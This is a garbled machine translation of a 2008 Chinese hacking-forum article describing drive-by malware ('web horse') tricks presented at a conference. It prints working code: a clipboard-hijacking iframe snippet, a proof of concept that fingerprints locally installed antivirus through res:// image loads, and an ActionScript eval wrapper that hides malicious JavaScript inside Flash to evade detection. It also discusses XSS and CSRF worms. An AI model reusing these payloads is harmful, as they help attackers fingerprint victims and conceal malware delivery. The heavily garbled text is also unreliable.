xKungfoo on the net horse obscene skill-vulnerability warning-the black bar safety net

2008-11-24T00:00:00
ID MYHACK58:62200821188
Type myhack58
Reporter 佚名
Modified 2008-11-24T00:00:00

Description

Author: cosine

Today xKungfoo on the last day, G in the above a hung it to a chain of issues. Some hung it to the obscene tricks did not say in detail, where disclosed. In fact, some nothing, is the skill, some people also played.

The first one, clipboard hijacking hung it to the

This is actually for the rich text editor of a covert attack mode, when you paste a paragraph from elsewhere in the Copy to text, it will perform a iframe tag objects Rich Text Editor, the iframe loads the web horse. Simple demo of:

<iframe src=http://www. baidu. com/ height=1 1 0 width=1 1 0></iframe> <script> var iframe = document. getElementsByTagName("iframe")[0]; var rng = document. body. createControlRange(); rng. add(iframe); rng. execCommand('Copy'); </script>

Only in IE6, how to expand it to see everyone, in fact generally such obscene tricks for entertainment only, real use, I think is also unlikely, unless it becomes more obscene.

Second, the img of the remote domain to detect the local domain software installed

Net horse to detect a local install what software? Nothing more than those security software, the card Bar, The Little Red umbrella, 3 6 0 and 3 6 5 door(AD: by the way, 3 6 5 not swim patrol of the cottage - -, and 3 6 0 positioning is not the same as the like. Stable demo: the

<script> //////////////////////////////////////////////////////// //Name: img tag to the remote domain to detect the local domain of the software whether there is a poc //Description: The IE browser are valid //Author: Knownsec Team //Date: 2008-11-03 //////////////////////////////////////////////////////// knownImg = {} knownImg. resList = [ //array to fill in the local software id value and the image address value of the res Protocol or file Protocol {id: 'Avira', res: 'res://C:\\Program%20Files\\Avira\the\ \ AntiVir%20PersonalEdition%20Classic\\setup. dll/#2/#1 3 2'}, {id: 'baidu', res: 'res://C:\\Program%20Files\\baidu\\Baidu%20Hi\\BaiduHi. exe/#2/#1 5 2'}, {id: 'Super Rabbit', res: 'res://C:\\Program%20Files\\Super%20Rabbit\\MagicSet\\timedate. exe/#2/BBNO'}, {id: '365Menshen', res: 'res://C:\\Program%20Files\\365Menshen\\menshen. exe/#2/#2 2 7'}, {id: 'quicktime', res: 'res://c:\\program%20files\\quicktime\\which. exe/#2/#4 0 3'} ]; knownImg. ok_resList = new Array(); //confirm that the software exists, fill this array knownImg. tmp_resList = new Array();

knownImg. checkSoft = function(){ //detection function if (document. all){ x = new Array(); for (i = 0; i < knownImg. resList. length; i++){ x[i] = new Image(); x[i]. src = ""; knownImg. ok_resList. push(knownImg. resList[i]. id); //will resList the id value in turn thrown into the ok_resList array x[i]. onload = function(){ //alert(knownImg. resList[i]. id + ': return true'); } x[i]. onerror = function(){ //alert(knownImg. resList[i]. id + ': return false'); knownImg. ok_resList. pop(); //software does not exist, from the ok_resList an array of pop-up the corresponding id value } x[i]. src = knownImg. resList[i]. res; } } } knownImg. checkSoft();

alert(knownImg. ok_resList); //pop-up document. write('your system has the following software:<br />'+knownImg. ok_resList. join('<br />')); </script>

IE6/7/8 pass to kill, I finished this POC a few days it told foreigners already given POC, the above code is our own explored out, at the time of the res Protocol is also not too understand, also ask some friends. Now We of this POC and the expandability is good, very stable. You can change directly.

Third, using the Flash package network.

This is more obscene, we use the service-end technical protection network horse, protection to protect the go, network the horse of the JS code will still be caught, in those browser capture tool, network the horse of the JS exposed, the principle is very simple, net horse, no matter how by judging, such as by a Cookie, IP, referer, etc. to protect themselves, in order to harm the user, always want to output the JS to the browser to execute, then it will be exposed to the net horse JS code. That is no way to protect our net horse JS code? There......

We use Flash to package net horse, so, using Flash AS the extension API: the ExternalInterface class, this class is AS with JS direct communication the best way, such as the following AS code:

import flash. external.*; ExternalInterface. call("eval","alert(document. domain);function ajax(){var request = false;if(window. XMLHttpRequest) {request = new XMLHttpRequest();} else if(window. ActiveXObject) {var versions = ['Microsoft. XMLHTTP', 'MSXML. XMLHTTP', 'Microsoft. XMLHTTP', 'Msxml2. XMLHTTP. 7. 0', 'Msxml2. XMLHTTP. 6. 0', 'Msxml2. XMLHTTP. 5. 0', 'Msxml2. XMLHTTP. 4. 0', 'MSXML2. XMLHTTP. 3. 0', 'MSXML2. XMLHTTP'];for(var i=0; i<versions. length; i++) {try {request = new ActiveXObject(versions[i]);} catch(e) {}}}return request;}var xhr = ajax();function post_it(){var cmd = 'cmd=hi';xhr. open ('POST', 'create_cmd.php', false);xhr. setRequestHeader('Content-Type','application/x-www-form-urlencoded');xhr. send(cmd);}post_it();");

The above code what is the principle of it, the ExternalInterface class to call the method directly using the Flash container here is the HTML page to the JS function, it has two parameters, the first one is to call the JS function name, the second is to call the JS function to be performed parameters. Here we are actually hijacking the eval function, which is a JS built-in functions, the use of it can execute any JS code. According to this principle, we can move all the JS code is encapsulated in the Flash file.

G use this method successfully encapsulates 0 6 0 1 4 net horse, and our Flash compression and encryption protection, the use of a General Flash decompiling software is cracked, and on the web horse of the implementation process, is not through a browser capture tool to grab to net horse JS code. This plays a good protective effect: a).

Fourth, Web2. 0 worms formula hung it to the

This is to say, the traditional hung it to the way of great harm of a mass sql injection, in a short period of time bulk injection hung it on. We still haven't seen the Web2. 0 worms-style hanging horse, we discussed that: this is a cost issue however is not so I don't know, not everyone can easily write out the Web2. 0 worms. However, the winds today in xKungfoo on that in the future will make everyone very easy to write outXSSworms, and that is anehta platform will provide Packed some worms function.

Web2. 0 worms there are now two forms: XSSworms and CSRF worms. In the Web2. 0 worm propagation process can completely hang horse。 Before the release of some of the Web2. 0 worms is a joke, not given harm, but don't think it will everIs a hack of a joke. We believe we hung it way will appear this......

Well, this is today's G of the speech contents of the part. There are some obscene tricks, maybe for our Webscan full network monitoring system is a challenge, but I believe the General hung it to those who do not use some of the obscene skills, then only when the entertainment bar.